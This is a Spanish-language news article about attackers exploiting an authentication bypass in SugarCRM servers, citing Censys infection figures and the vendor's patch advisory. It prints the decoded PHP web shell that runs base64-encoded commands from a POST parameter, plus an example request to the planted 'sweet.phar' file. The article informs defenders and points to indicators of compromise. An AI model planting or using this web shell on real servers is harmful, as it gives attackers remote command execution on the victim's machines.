Durante las últimas dos semanas, los piratas informáticos han estado explotando una vulnerabilidad crítica en el sistema SugarCRM (administración de relaciones con los clientes) para infectar a los usuarios con malware que les otorga el control total de sus servidores.
La vulnerabilidad comenzó como un día cero cuando el código de explotación fue publicado en línea a fines de diciembre. La persona que publicó el exploit lo describió como una omisión de autenticación con ejecución remota de código, lo que significa que un atacante podría usarlo para ejecutar código malicioso en servidores vulnerables sin necesidad de credenciales. SugarCRM ha publicado desde entonces un consultivo
Mark Ellzey, investigador sénior de seguridad del servicio de monitoreo de red Censys, dijo en un correo electrónico que, hasta el 11 de enero, la compañía había detectado 354 servidores SugarCRM infectados con el día cero. Eso es cerca del 12 por ciento del total de 3059 servidores SugarCRM detectados por Censys. A partir de la semana pasada, las infecciones fueron más altas en los EE. UU., con 90, seguido de Alemania, Australia y Francia. En una actualización del martes, Censys dijo que la cantidad de infecciones no ha aumentado mucho desde la publicación original.
El aviso de SugarCRM, publicado el 5 de enero, puso a disposición las revisiones y dijo que ya se había aplicado a su servicio basado en la nube. También aconsejó a los usuarios con instancias que se ejecutan fuera de SugarCloud o el alojamiento administrado por SugarCRM que instalen las revisiones. El aviso decía que la vulnerabilidad afectaba a las soluciones de software Sugar Sell, Serve, Enterprise, Professional y Ultimate. No afectó al software de Sugar Market.
El bypass de autenticación, dijo Censys, funciona en contra de la /index.php/ directorio. “Después de que la omisión de autenticación sea exitosa, se obtiene una cookie del servicio y se envía una solicitud POST secundaria a la ruta ‘/cache/images/sweet.phar’ que carga un pequeño archivo codificado en PNG que contiene código PHP que será ejecutado por el servidor cuando se realiza otra solicitud del archivo”, agregaron los investigadores de la compañía.
Cuando el binario se analiza con el software hexdump y se decodifica, el código PHP se traduce aproximadamente a:
〈?php
echo “#####”;
passthru(base64_decode($_POST[“c”]));
echo “#####”;
?〉
“Este es un shell web simple que ejecutará comandos basados en el valor del argumento de consulta codificado en base64 de ‘c’ (por ejemplo, ‘POST /cache/images/sweet.phar?c=”L2Jpbi9pZA==” HTTP/1.1’, que ejecutará el comando “/bin/id” con los mismos permisos que la identificación del usuario que ejecuta el servicio web), explica la publicación.
Un shell web proporciona una ventana basada en texto que los atacantes pueden usar como interfaz para ejecutar comandos o código de su elección en dispositivos comprometidos. Ellzey de Censys dijo que la compañía no tenía visibilidad precisa para qué los atacantes están usando los proyectiles.
Los avisos de Censys y SugarCRM brindan indicadores de compromiso que los clientes de SugarCRM pueden usar para determinar si han sido atacados. Los usuarios de productos vulnerables deben investigar e instalar revisiones lo antes posible.